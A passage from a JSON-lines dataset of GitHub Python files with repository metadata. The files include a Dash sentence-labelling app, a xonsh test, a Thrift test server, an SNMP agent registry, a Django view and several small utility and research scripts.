\"\").replace(\"\\n\", \" \")\n tokenizer = PunktSentenceTokenizer(document)\n sentences = tokenizer.tokenize(document)\n return json.dumps(sentences), \"\"\n else:\n decoded = json.loads(file.read())\n query = decoded[\"query\"]\n sentences = decoded[\"document\"].split(\"\\n\\n\")\n return json.dumps(sentences), query\n else:\n return None, \"\"\n\n@app.callback(\n Output(\"paper_data\", \"children\"),\n Input(\"sentences\", \"data\")\n)\ndef update_paper_data(sentences):\n if sentences:\n sentences = json.loads(sentences)\n output = [\n html.P(f\"Characters: {len(''.join(sentences)):,}\"),\n html.P(f\"Sentences: {len(sentences):,}\")\n ]\n return output\n else:\n return None\n\n@app.callback(\n Output(\"highlights_table\", \"children\"),\n Input(\"sentences\", \"data\")\n)\ndef update_highlights(sentences):\n if sentences:\n sentences = json.loads(sentences)\n header = html.Thead(\n [\n html.Th(\"Sentence\"),\n html.Th(\"Text\"),\n ]\n )\n output = [header]\n for i, s in enumerate(sentences):\n row = html.Tr(\n [\n html.Td(i), \n html.Td(s), \n ],\n id = dict(kind = \"highlight_row\", index = i)\n )\n output.append(row)\n return dbc.Table(output)\n else:\n return [html.Td(\"The sentences of the paper will appear here\", \n id = dict(kind = \"highlight_row\", index = 0))]\n\n@app.callback(\n Output({\"kind\":\"highlight_row\", \"index\":MATCH}, \"style\"),\n Input({\"kind\":\"highlight_row\", \"index\":MATCH}, \"n_clicks\"),\n prevent_initial_call = True\n)\ndef update_row_colors(clicks):\n ctx = dash.callback_context.triggered[0]\n prop_id = json.loads(ctx[\"prop_id\"].split(\".\")[0])\n index = prop_id[\"index\"]\n # print(ctx)\n # print(index)\n if clicks:\n return {\"background\":\"lightgreen\"} if (clicks % 2) == 1 else {\"background\":\"lightpink\"}\n\n@app.callback(\n Output(\"relevant\", \"data\"),\n Input({\"kind\":\"highlight_row\", \"index\":ALL}, \"style\"),\n Input(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n # prevent_initial_call = True\n)\ndef update_relevant(*args):\n # print(\"\\nupdate_relevant\")\n ctx = dash.callback_context.triggered[0]\n #print(ctx)\n prop_id = ctx[\"prop_id\"]\n ctx_value = ctx[\"value\"]\n # print(prop_id)\n # print(ctx_value)\n # print(ctx_value[:8])\n # print(ctx_value[:10])\n output = None\n if (prop_id == \"sentences.data\" and args[-2]):\n #print(\"loading sentences\")\n sentences = json.loads(args[-2])\n output = json.dumps([None for s in sentences])\n elif prop_id[:8] == '{\"index\"' and ctx_value and args[-1]:\n #print(\"updating relevant\")\n index = json.loads(prop_id.split(\".\")[0])[\"index\"]\n relevant = json.loads(args[-1])\n if ctx_value[\"background\"] == \"lightgreen\":\n relevant[index] = True\n elif ctx_value[\"background\"] == \"lightpink\":\n relevant[index] = False\n output = json.dumps(relevant)\n elif prop_id == '{\"index\":0,\"kind\":\"highlight_row\"}.style' and ctx_value is None and args[-1]:\n #print(\"initial table\")\n relevant = json.loads(args[-1])\n output = json.dumps(relevant)\n return output\n # prop_id = json.loads(ctx[\"prop_id\"].split(\".\")[0])\n # index = prop_id[\"index\"]\n # print(prop_id)\n # styles = args[:-1][0]\n # print(styles)\n # sentences = args[-1]\n # # print(sentences)\n # # print(len(sentences))\n # if sentences:\n # sentences = json.loads(sentences)\n # # print(sentences)\n # print(len(sentences))\n # output = []\n # for s in styles:\n # output.append(None)\n # return json.dumps(output)\n # else:\n # return None\n\n@app.callback(\n Output(\"accepted_sentences\", \"children\"),\n Input(\"relevant\", \"data\"),\n State(\"sentences\", \"data\")\n)\ndef update_summary_table(relevant, sentences):\n # print(\"\\nupdate_summary_table\")\n # print(relevant)\n if relevant:\n relevant = json.loads(relevant)\n sentences = json.loads(sentences)\n #print(relevant)\n #return html.Ul([html.Li(f\"{i} - {s}\") for i, (s, r) in enumerate(zip(sentences, relevant)) if r])\n return dbc.Table([html.Tr([html.Td(i), html.Td(s)]) for i, (s, r) in enumerate(zip(sentences, relevant)) if r])\n else:\n return None\n\n@app.callback(\n Output(\"download_txt\", \"data\"),\n Input(\"download_txt_button\", \"n_clicks\"),\n State(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n prevent_initial_call = True\n)\ndef download_txt(clicks, sentences, relevant):\n filename = \"summary.txt\"\n content = \"\"\n if sentences and relevant:\n sentences = json.loads(sentences)\n relevant = json.loads(relevant)\n content = \"\\n\\n\".join([s for s, r in zip(sentences, relevant) if r])\n return dict(filename = filename, content = content)\n\n@app.callback(\n Output(\"download_csv\", \"data\"),\n Input(\"download_csv_button\", \"n_clicks\"),\n State(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n prevent_initial_call = True\n)\ndef download_csv(clicks, sentences, relevant):\n filename = \"summary.csv\"\n content = \"\"\n if sentences and relevant:\n sentences = json.loads(sentences)\n relevant = json.loads(relevant)\n content = pd.DataFrame(\n [(i, s, r) for i, (s, r) in enumerate(zip(sentences, relevant)) if r is not None],\n columns = [\"sentence\", \"text\", \"relevance\"]\n ).to_csv()\n return dict(filename = filename, content = content)\n\n@app.callback(\n Output(\"download_json\", \"data\"),\n Input(\"download_json_button\", \"n_clicks\"),\n State(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n State(\"query\", \"value\"),\n prevent_initial_call = True\n)\ndef download_json(clicks, sentences, relevant, query):\n filename = \"ground_truth_results.json\"\n content = \"\"\n if sentences and relevant:\n sentences = json.loads(sentences)\n relevant = json.loads(relevant)\n labels = pd.DataFrame(\n [(i, s, r) for i, (s, r) in enumerate(zip(sentences, relevant)) if r is not None],\n columns = [\"sentence\", \"text\", \"relevance\"]\n )\n content = dict(\n sentences = sentences,\n query = query,\n labels = labels.to_json()\n )\n return dict(filename = filename, content = json.dumps(content))\n\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"jarobyte91/quotes_gt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8624281993","text":"import os\nimport subprocess\n\nimport pytest # noqa F401\n\nfrom xonsh.completers.man import complete_from_man\nfrom xonsh.pytest.tools import skip_if_not_on_darwin, skip_if_on_windows\n\n\n@skip_if_on_windows\n@pytest.mark.parametrize(\n \"cmd,exp\",\n [\n [\n \"yes\",\n {\"--version\", \"--help\"},\n ],\n [\n \"man\",\n {\n \"--all\",\n \"--apropos\",\n \"--ascii\",\n \"--catman\",\n \"--config-file\",\n \"--debug\",\n \"--default\",\n \"--ditroff\",\n \"--encoding\",\n \"--extension\",\n \"--global-apropos\",\n \"--gxditview\",\n \"--help\",\n \"--html\",\n \"--ignore-case\",\n \"--local-file\",\n \"--locale\",\n \"--location\",\n \"--location-cat\",\n \"--manpath\",\n \"--match-case\",\n \"--names-only\",\n \"--nh\",\n \"--nj\",\n \"--no-subpages\",\n \"--pager\",\n \"--preprocessor\",\n \"--prompt\",\n \"--recode\",\n \"--regex\",\n \"--sections\",\n \"--systems\",\n \"--troff\",\n \"--troff-device\",\n \"--update\",\n \"--usage\",\n \"--version\",\n \"--warnings\",\n \"--whatis\",\n \"--wildcard\",\n },\n ],\n ],\n)\ndef test_man_completion(xession, check_completer, cmd, exp):\n xession.env[\"MANPATH\"] = os.path.dirname(os.path.abspath(__file__))\n completions = check_completer(cmd, complete_fn=complete_from_man, prefix=\"-\")\n assert completions == exp\n\n\n@skip_if_not_on_darwin\n@pytest.mark.parametrize(\n \"cmd,exp\",\n [\n [\n \"ar\",\n {\n \"-L\",\n \"-S\",\n \"-T\",\n \"-a\",\n \"-b\",\n \"-c\",\n \"-d\",\n \"-i\",\n \"-m\",\n \"-o\",\n \"-p\",\n \"-q\",\n \"-r\",\n \"-s\",\n \"-t\",\n \"-u\",\n \"-x\",\n },\n ],\n ],\n)\ndef test_bsd_man_page_completions(xession, check_completer, cmd, exp):\n proc = subprocess.run([cmd, \"--version\"], stderr=subprocess.PIPE)\n if (cmd == \"ar\" and proc.returncode != 1) or (\n cmd == \"man\" and proc.stderr.strip() not in {b\"man, version 1.6g\"}\n ):\n pytest.skip(\"A different man page version is installed\")\n # BSD & Linux have different man page version\n completions = check_completer(cmd, complete_fn=complete_from_man, prefix=\"-\")\n assert completions == exp\n","repo_name":"xonsh/xonsh","sub_path":"tests/test_man.py","file_name":"test_man.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":7388,"dataset":"github-code","pt":"78"} +{"seq_id":"19529065865","text":"#!/usr/bin/env python\n\"\"\"\nRun basic end-to-end test\n\"\"\"\n__author__ = 'Dan Gunter '\n\n# Stdlib\nimport argparse\nimport logging\nimport subprocess\nimport sys\nimport time\n# Third-party\n#from thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\nfrom thrift.server.THttpServer import THttpServer\n# Local\nfrom kbtest.basic import thrift_service\n\n\n# Logging boilerplate\n_log = logging.getLogger('run_basic')\n_h = logging.StreamHandler()\n_h.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)s '\n '%(message)s'))\n_log.addHandler(_h)\n_log.setLevel(logging.INFO)\n\n#: Server listen port\nPORT = 9100\n\n\ndef run_cors_proxy(path, port):\n _log.info('Run CORS proxy. program={} port={}'.format(path, port))\n cmd = 'CORSPROXY_PORT={port} {bin}'.format(port=port, bin=path)\n proxy = subprocess.Popen(cmd, shell=True)\n _log.info('CORS proxy started. pid={}'.format(proxy.pid))\n return proxy\n\nclass BasicTestHandler(thrift_service.Iface):\n def get_a_map(self, mapkeys):\n _log.debug('get_a_map/start. keys={}'.format(mapkeys))\n result = {}\n i = 1\n for key in mapkeys:\n result[key] = 1.0 * i\n i += 1\n _log.debug('get_a_map/end. result={}'.format(result))\n return result\n\n def add_integers(self, x, y):\n _log.debug('add_integers/start. x={} y={}'.format(x, y))\n result = x + y\n _log.debug('add_integers/end. result={}'.format(result))\n return result\n\ndef main(cmdline):\n p = argparse.ArgumentParser()\n p.add_argument('-c', '--proxy', dest='proxy_bin', default='',\n help='Run CORS proxy binary at PATH', metavar='PATH')\n p.add_argument('-p', '--port', dest='proxy_port', type=int, default=8000,\n help='Run CORS proxy on PORT (default=%(default)d)',\n metavar='PORT')\n p.add_argument('-v', '--verbose', action='count', dest='vb', default=0,\n help='Increase verbosity of output to stderr')\n\n args = p.parse_args(cmdline)\n\n loglevel = [logging.WARN, logging.INFO, logging.DEBUG][min(args.vb, 2)]\n _log.setLevel(loglevel)\n\n use_proxy, proxy = bool(args.proxy_bin), None\n if use_proxy:\n proxy = run_cors_proxy(args.proxy_bin, args.proxy_port)\n\n handler = BasicTestHandler()\n processor = thrift_service.Processor(handler)\n #transport = TSocket.TServerSocket(port=PORT)\n tfactory = TTransport.TBufferedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n server = THttpServer(processor, ('localhost', PORT), pfactory)\n\n _log.info('Start server. port={:d}'.format(PORT))\n try:\n server.serve()\n except KeyboardInterrupt:\n _log.info('Interrupted')\n _log.info('Server stopped')\n\n # Stop the proxy, if it was running\n if proxy is not None:\n _log.info('Stopping CORS proxy. pid={}'.format(proxy.pid))\n for i in range(3):\n proxy.terminate()\n time.sleep(1)\n proxy.poll()\n if proxy.returncode is not None:\n break\n if proxy.returncode is None:\n proxy.kill()\n time.sleep(2)\n proxy.poll()\n if proxy.returncode is None:\n _log.error('Failed to stop CORS proxy. pid={}'.format(proxy.pid))\n else:\n _log.debug('CORS proxy stopped.')\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"kbase/kbase-data-thrift-js","sub_path":"src/python/scripts/run_basic.py","file_name":"run_basic.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3979087708","text":"string_phrase = 'with three words'\nabcgo = string_phrase + ' '\nx = 0\nabclist = list()\nfor letter in abcgo:\n if letter == ' ' and len(abclist)<1: \n word = (abcgo[:x])\n abclist[len(abclist):] = [word]\n buffer = (abcgo[:x])\n int_buffer = len(buffer)\n elif letter == ' ' and len(abclist) >= 1:\n word = (abcgo[int_buffer+1:x])\n abclist[len(abclist):] = [word]\n buffer = (abcgo[:x])\n int_buffer = len(buffer)\n x+=1\nprint(abclist)","repo_name":"SuprLazr/Learning","sub_path":"Python/Function Processes/append_practice.py","file_name":"append_practice.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30013499438","text":"import torch as t\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\nclass FasterRCNN(nn.Module):\n \"\"\"This is the base class for Faster RCNN.\n It is composed of following three parts.\n 1. **Feature Extraction**: This stage is to extract and down sampling features from the given image,\\\n using conv layers and pooling layers.\n 2. **Region Proposal Network**: Given the features extracted, this stage decides Regions of Interest\\\n (RoIs) of the objects.\n 3. **Localization and Classification Heads**: This stage uses the extracted features and RoIs to \\\n classify the categories of the objects and promote localization performances.\n \"\"\"\n def __init__(self,extractor,rpn,head):\n super(FasterRCNN,self).__init__()\n self.extractor=extractor\n self.rpn=rpn;\n self.head=head\n def forward(self,x,scale=1.):\n xFeatured=self.extractor(x)\n rpn_locs,rpn_scores,rois,roi_indices,anchor=self.rpn(xFeatured,x.size()[2:],scale)\n roi_cls_locs,roi_scores=self.head(xFeatured,rois,roi_indices)\n return roi_cls_locs,roi_scores,rois,roi_indices","repo_name":"PanJason/PlateDetection","sub_path":"model/fasterRCNN_frame.py","file_name":"fasterRCNN_frame.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74316727610","text":"import numpy as np\nimport pylab as pl\nimport matplotlib\nimport pandas as pd\npl.ion()\n\n#execfile('rfichar.py')\n#execfile('ngvlapar.py')\n\nfrom rfichar import *\nfrom ngvlapar import *\n\n\n\"\"\"\nRFI solutions\n\"\"\"\nsolutions = {\n'A':{'desc':\"Antenna based high resolution flagging\", \n \"Effort\":\"Medium\", \"Risk\" : \"low\", \"Gains\" : \"High\", \n 'datares':np.array([1e-10, 1e-09, 1e-08]),## Data windows are 100 times higher.\n 'chanres':1e+6}, ## (in kHz) nanosec pulses, 1GHz bw.\n'B':{'desc':\"Baseline based high resolution flagging\", \n \"Effort\" : \"Medium\", \"Risk\" : \"low\", \"Gains\" : \"Medium\",\n# 'datares' : np.array([1e-07, 1e-06, 1e-05, 1e-04, 1e-03, 1e-02]),\n 'datares' : np.array([1e-05, 1e-04, 1e-03, 1e-02]),\n 'chanres' : 100.0},\n'C':{'desc':\"High resolution modeling and subtraction\", \n \"Effort\" :\"High\", \"Risk\" : \"high\", \"Gains\" : \"High\",\n 'datares' : np.array([1e-06, 1e-05, 1e-04, 1e-03]),\n 'chanres' : 10.0 },\n'D': {'desc':\"Post-processing flagging\",\n \"Effort\" : \"Low\", \"Risk\" : \"low\", \"Gains\" : \"Low\",\n 'datares' : np.array([0.1, 1.0, 10.0]),\n 'chanres' : 1e+3}\n}\n\n#Type E : smart scheduling in time/freq/direction ( Effort : Medium, Risk : Low, Gains : High )\n\ndef cost_of_solutions():\n \n ## Base cost is type D, defined in terms of numbers of visibilities, with 0.1 sec timesteps and 2k channels per band. . \n timeress = pl.exp(pl.arange(-10,3))\n \n pl.figure(3)\n pl.clf()\n\n cols = {'A':'red', 'B':'blue', 'C': 'orange', 'D':'green'}\n labs = {'A':'Antenna-based Flagging', 'B':'In-correlator Flagging', 'C': 'Modeling and subtraction', 'D':'Post Processing Flagging'}\n\n for sol in ['A','B','C','D']:\n ## ntimesteps per 1 sec and nchan per 1MHz (1e+3 kHz)\n\n tres = 1.0 ## ntimes in 1 second.\n fres = 1e+5 ## nchans in 100 MHz ( 1e+5 kHz ) : 1 spw. \n\n ntimes = tres / solutions[sol]['datares'] \n nchans = fres / solutions[sol]['chanres'] \n npol = 4\n\n volperchunk = 1\n parwidth = 1 ## Parallelization by N times\n\n totalvol = totalants * ntimes * nchans * npol\n\n if sol=='A':\n parwidth = 'antenna'\n parquant = totalants\n if sol=='B':\n parwidth = 'baseline'\n parquant = totalvis\n if sol=='C':\n parwidth = 'time,freq'\n parquant = ntimes*nchans\n if sol=='D':\n parwidth = 'baseline'\n parquant = totalvis\n\n volperchunk = totalvol / (parquant)\n\n\n# pl.subplot(211)\n pl.plot(solutions[sol]['datares'], (totalvol), '.-', color=cols[sol], label=labs[sol])\n pl.plot(solutions[sol]['datares'], volperchunk, '.--', color=cols[sol] , label=labs[sol] + ' [ parallelize on ' + parwidth + ']')\n \n# pl.subplot(212)\n# pl.plot(solutions[sol]['datares'], parquant, '.-', color=cols[sol] , label=sol+', partitioned by '+parwidth)\n \n\n# pl.subplot(211)\n pl.xscale('log')\n pl.yscale('log')\n pl.legend()\n# pl.xlabel('Data time resolution (sec)')\n pl.ylabel('N samples [ per '+str(tres)+ ' sec, '+str(fres/1e+3) + ' MHz ]')\n pl.title('Data rates for RFI mitigation')\n pl.ylim(0.1,10e+18)\n pl.xlabel('Time resolution (sec) of RFI mitigation solutions')\n\n# pl.subplot(212)\n# pl.xscale('log')\n# pl.yscale('log')\n# pl.legend()\n# pl.xlabel('Data time resolution (sec)')\n# pl.ylabel('Parallelization width')\n \n pl.savefig('fig_rfi_mitigation_cost.png')\n","repo_name":"urvashirau/ngVLA-RFI-impact-simulator","sub_path":"RFI_Impact_Calculator/rfisol.py","file_name":"rfisol.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"29860220554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\njaparker_hw_4_2.py\r\nJefferson Parker\r\nClass: CS 521 - Spring 1\r\nDate: February 10, 2022\r\n\r\nQuantify the instance of each character in a sentence using a dictionary.\r\nIgnore case.\r\nPrint results to output.\r\n\"\"\"\r\n\r\n# Import modules\r\nimport string\r\n\r\n# Intiialize variables\r\nSENTENCE = \"The rain in Spain falls mainly on the plain.\"\r\ncount_dict = dict()\r\n\r\n# Case doesn't matter, make them all uppercase\r\n# Remove any punctuation characters.\r\n# Remove space characters.\r\nworking_sentence = SENTENCE.upper()\r\nworking_sentence = working_sentence.strip(string.punctuation)\r\nworking_sentence = working_sentence.replace(\" \", \"\")\r\n\r\n# Count the instances of each character in working_sentence.\r\nfor char in list(working_sentence):\r\n if char in count_dict:\r\n count_dict[char] += 1\r\n else:\r\n count_dict[char] = 1\r\n \r\n# Get the character(s) that have the maximum count.\r\ncount_max = max(list(count_dict.values()))\r\nchars_max = list()\r\n\r\nfor char in count_dict.keys():\r\n# print(char, \" \", count_dict[char])\r\n if count_dict[char] == count_max:\r\n chars_max.append(char)\r\n\r\nprint(\"The string being analyzed is: \\\"\", SENTENCE, \"\\\"\", sep=\"\")\r\nprint(\"1. Dictionary of letter counts: \", count_dict)\r\nprint(\"2. Most frequent letter(s)\", chars_max, \"appear\", count_max, \"times\")","repo_name":"japarker02446/BUProjects","sub_path":"CS521 Data Structures with Python/Homework4/japarker_hw_4_2.py","file_name":"japarker_hw_4_2.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35364127326","text":"#!/usr/bin/python3\n\"\"\"\nUsing what you did in task 0, extend\nyour python script to export data in the\njson format\n\"\"\"\n\nif __name__ == '__main__':\n import requests\n from sys import argv\n import json\n\n userId = argv[1]\n user_url = 'https://jsonplaceholder.typicode.com/users/{}/'.format(userId)\n todos_url = 'https://jsonplaceholder.typicode.com/users/{}/todos'.format(\n userId)\n todos = requests.get(url=todos_url)\n users = requests.get(user_url)\n if todos.status_code == 200 and users.status_code == 200:\n user_data = users.json()\n todo_data = todos.json()\n user_name = user_data.get('username')\n file_name = '{}.json'.format(userId)\n\n todo_list = []\n for todo in todo_data:\n data = {}\n data['task'] = todo.get('title')\n data['completed'] = todo.get('completed')\n data['username'] = user_name\n\n todo_list.append(data)\n\n json_data = {\n userId: todo_list\n }\n\n with open(file_name, 'w') as json_file:\n json.dump(json_data, json_file)\n","repo_name":"callmhejerry/alx-system_engineering-devops","sub_path":"0x15-api/2-export_to_JSON.py","file_name":"2-export_to_JSON.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25506614265","text":"# calculate the sum of number from user n + nn + nnn\nnum = int(input(\"Entert a number: \"))\n\nnum1 = int(\"%d\" %num)\nnum2 = int(\"%d%d\" %(num, num))\nnum3 = int(\"%d%d%d\" %(num, num, num))\n\ncalculate = num1 + num2 + num3\n\nprint(\"Your caculate \" + str(num1) + \" + \" + str(num2) + \" + \" + str(num3) + \" = \" + str(calculate))\n","repo_name":"kietalang/python_intern","sub_path":"Python exercises/Python basic/exercise10.py","file_name":"exercise10.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74333687290","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom item.models import Department, Chicken\nfrom user.models import UserProfile\nfrom django.http import JsonResponse\n\n@login_required\ndef index(request):\n \n departments = Department.objects.all()\n \n\n \n return render(request, 'dashboard/index.html', {\n 'departments': departments,\n })\n\n@login_required\ndef chart_data(request):\n \n user_profile = UserProfile.objects.get(user=request.user)\n \n return JsonResponse({\n 'egg_amount': user_profile.int_array,\n })\n","repo_name":"KajetanMieloch/Django-Chick-Sim","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14150889554","text":"from Agente import Agente\nfrom RRD import RRD\nfrom SNMP import SNMP\nfrom os import system\nimport subprocess\nfrom pysnmp.hlapi import *\nimport threading\nfrom itertools import count\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport rrdtool\nimport time\nimport os\n\nclass Registro:\n def __init__(self, nombre = \"agentes.txt\", agentes = [],\n datos =[['inMCast','1.3.6.1.2.1.31.1.1.1.2.2'],\n ['inPkt','1.3.6.1.2.1.4.9.0'],\n ['rspICMP', '1.3.6.1.2.1.5.21.0'],\n ['outSeg', '1.3.6.1.2.1.6.11.0'],\n ['inErrDGram', '1.3.6.1.2.1.7.3.0']]):\n self.nombre = nombre\n self.agentes = agentes\n self.datos = datos\n\n def importArch(self, arch = \"agentes.txt\"):\n with open(arch, \"r\") as f:\n lineas = f.readlines()\n for line in lineas:\n self.agentes.append(Agente(line.split()[0], line.split()[1], line.split()[2], line.split()[3]))\n return\n\n def pingUsuario(self, ip):\n res = subprocess.Popen([\"ping\", \"-c\", \"1\" ,ip],stdout = subprocess.PIPE).communicate()[0]\n if b'ttl=' in res:\n return \"up\"\n else:\n return \"down\"\n\n def agregarUsuario(self, agente):\n self.agentes.append(agente)\n f = open(self.nombre, \"a+\")\n system(\"mkdir \" + agente.ip)\n f.write(agente.ip + ' '+ agente.version+ ' '+ agente.comunidad+ ' '+ agente.interfaz + '\\n')\n self.crearTodoRRD(agente.ip)\n f.close()\n return True\n\n def eliminarUsuario(self, ip):\n #print(\"Eliminando usuario \" + ip)\n with open(\"agentes.txt\", \"r\") as f:\n lines = f.readlines()\n with open(\"agentes.txt\", \"w\") as f:\n for line in lines:\n if line.split()[0] != ip:\n f.write(line)\n for file in os.listdir(ip):\n system(\"rm \" + ip+ \"/\"+ file)\n system(\"rmdir \" + ip)\n for i,agente in enumerate(self.agentes):\n if agente.ip == ip:\n self.agentes.pop(i)\n return True\n\n def printUsuarios(self):\n print(\"\\tip\\n\")\n for i,ag in enumerate(self.agentes):\n print(\"{}.\\t{}\\n\".format(i, ag.ip))\n return\n\n def printResumen(self):\n print(\"#\\t ip\\t\\tversion\\tcomunidad\\t\\tinterfaz\\testado\\n\")\n for i,ag in enumerate(self.agentes):\n ping = self.pingUsuario(ag.ip)\n print(\"{}.\\t {}\\t {}\\t {}\\t {}\\t\\t{}\\n\".format(i, ag.ip, ag.version, ag.comunidad, ag.interfaz, ping))\n return\n\n def crearTodoRRD(self, host):\n for dato in self.datos:\n RRD.crearRRD(host, dato[0])\n return\n\n def updateTodo(self):\n threads = []\n for agente in self.agentes:\n t = threading.Thread(target=RRD.updateAgente,args=(agente, self.datos))\n threads.append(t)\n t.start()\n return\n\n def genGrafs(self, ventana):\n for ag in self.agentes:\n for dato in self.datos:\n RRD.generarGrafica(ag, ventana, dato[0])\n return\n\n def animate(i):\n data = pd.read_csv('data.csv')\n x = data['x_value']\n y1 = data['total_1']\n y2 = data['total_2']\n\n ax = plt.gca()\n line1, line2 = ax.lines\n\n line1.set_data(x, y1)\n line2.set_data(x, y2)\n\n xlim_low, xlim_high = ax.get_xlim()\n ylim_low, ylim_high = ax.get_ylim()\n\n ax.set_xlim(xlim_low, (x.max() + 5))\n\n y1max = y1.max()\n y2max = y2.max()\n current_ymax = y1max if (y1max > y2max) else y2max\n\n y1min = y1.min()\n y2min = y2.min()\n current_ymin = y1min if (y1min < y2min) else y2min\n\n ax.set_ylim((current_ymin - 5), (current_ymax + 5))\n return\n\n\n def grafTiempoReal(self, agente, dato):\n plt.style.use('fivethirtyeight')\n x_vals = []\n y_vals = []\n index = count()\n plt.plot([], [], label='Channel 1')\n plt.plot([], [], label='Channel 2')\n ani = FuncAnimation(plt.gcf(), self.animate, interval=1000)\n plt.legend()\n plt.tight_layout()\n plt.show()\n","repo_name":"carloslpz/Redes3","sub_path":"Problema2/Registro.py","file_name":"Registro.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5200614018","text":"import argparse\nimport asyncio\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Optional\n\nfrom dotenv import load_dotenv\nfrom article import Article\nfrom cache import SearchCache\nfrom exporter import CSVExporter\nfrom search import SearchRequest, SearchToken\nfrom search_engine import SearchEngine\nfrom search_source import GoogleScholarSearch, IEEESearch, ACMSearch\n\n\ndef parse_args():\n\tparser = argparse.ArgumentParser(description='Systematic review')\n\t# Log arguments\n\tparser.add_argument(\n\t\t'--log-format', type=str,\n\t\tdefault='%(asctime)s %(levelname)s %(filename)s %(lineno)d \"%(name)s\" \"%(message)s\"',\n\t\thelp='Log format',\n\t)\n\tparser.add_argument(\n\t\t'-v', '--log-level', default='INFO', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'],\n\t\thelp='Log level',\n\t)\n\n\t# Engine arguments\n\tparser.add_argument(\n\t\t'--sleep-between-calls', default=100.0, type=float, help='Time (ms) to sleep between calls'\n\t)\n\tparser.add_argument('--list-articles', default=False, help='List the articles found', action=\"store_true\")\n\t# Searches\n\tparser.add_argument('--term', action='append', help='Search terms')\n\tparser.add_argument('--title', action='append', help='Search titles')\n\tparser.add_argument('--author', action='append', help='Search titles')\n\n\t# Cache arguments\n\tparser.add_argument(\n\t\t'--cache-save-every', default=10, help='Saves cache every new requests',\n\t)\n\tparser.add_argument('--cache-compress', default=False, help='Compress cache', action=\"store_true\")\n\tparser.add_argument('--cache-file-name', default='data/cache.sr', help='Cache file name')\n\tparser.add_argument(\n\t\t'--env-file-name', default=Path('..') / '.env', help='Environment file name',\n\t)\n\tparser.add_argument('--compact-cache-file', help='Creates a compacted cache file')\n\tparser.add_argument('--recover-compact-cache-file', help='Recover the cache file form the compacted one')\n\tparser.add_argument('--cache-searches', default=False, help='Prints searches in the cache', action=\"store_true\")\n\tparser.add_argument('--cache-sources', default=False, help='Prints sources in the cache', action=\"store_true\")\n\tparser.add_argument('--cache-list', default=False, help='Lists the articles in the cache', action=\"store_true\")\n\n\t# Sources\n\tparser.add_argument(\n\t\t'--source-google-scholar', default=False, help='Uses Google Scholar as source',\n\t)\n\tparser.add_argument(\n\t\t'--google-scholar-use-proxy', default=False, help='Google Scholar should use proxy', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--source-ieee', default=False, help='Use IEEE as source (Requires API key)', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--source-acm', default=False, help='Use ACM as source', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--ignore-cache', default=False, help='Ignore the cache for the selected sources', action=\"store_true\",\n\t)\n\n\t# Exporters\n\tparser.add_argument('--export-csv', help='Filename for the CSV exporter')\n\n\t# TODO test score\n\tparser.add_argument(\n\t\t'--score', default='h_index', choices=['citations', 'h_index', 'i10_index'],\n\t\thelp='Score method',\n\t)\n\tparser.add_argument('--score-threshold', default=0, help='Lower bound for the score')\n\n\treturn parser.parse_args()\n\n\ndef article_simple_print(logger: logging.Logger, article: Article):\n\tauthors = f\"{article.author}\" if len(article.author) <= 3 else f\"{article.author[:1] + ['et al']}\"\n\tlogger.info(\n\t\tf\"Publisher: {article.publisher}, Journal: {article.journal}, title: {article.title},\"\n\t\tf\" authors: {authors}\"\n\t)\n\n\ndef build_search_engine(logger: logging.Logger, args) -> Optional[SearchEngine]:\n\tengine = SearchEngine(logger=logger)\n\tengine.save_every = args.cache_save_every\n\tengine.compress = args.cache_compress\n\tengine.cache_file_name = args.cache_file_name\n\tengine.sleep_between_calls_ms = args.sleep_between_calls\n\tif args.ignore_cache:\n\t\tengine.ignore_cache = True\n\n\tif args.source_google_scholar:\n\t\tengine.sources.append(GoogleScholarSearch(use_proxy=args.google_scholar_use_proxy))\n\tif 